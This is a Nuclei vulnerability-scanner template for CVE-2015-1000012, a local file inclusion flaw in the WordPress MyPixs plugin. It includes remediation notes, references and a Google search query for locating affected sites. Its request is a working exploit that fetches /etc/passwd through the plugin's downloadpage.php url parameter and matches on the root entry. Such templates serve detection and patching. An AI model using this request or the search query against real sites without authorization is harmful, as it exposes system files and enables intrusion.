nuclei-templates/http/cves/2015/CVE-2015-1000012.yaml

46 lines
1.6 KiB
YAML

id: CVE-2015-1000012
info:
name: WordPress MyPixs <=0.3 - Local File Inclusion
author: daffainfo
severity: high
description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
remediation: |
Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability.
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
- http://www.vapidlabs.com/advisory.php?v=154
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1000012
cwe-id: CWE-200
epss-score: 0.00773
epss-percentile: 0.79249
cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: mypixs_project
product: mypixs
framework: wordpress
google-query: inurl:"/wp-content/plugins/mypixs"
tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100e9110aa69e2672f44c5e2a9adfd5218f92e38a90297c54609eaa5a991ca59c11022010ae201b9e0e26bf1e0dae6a247d7898de981fb9618a020ba63d04928a7441e1:922c64590222798bb761d5b6d8e72950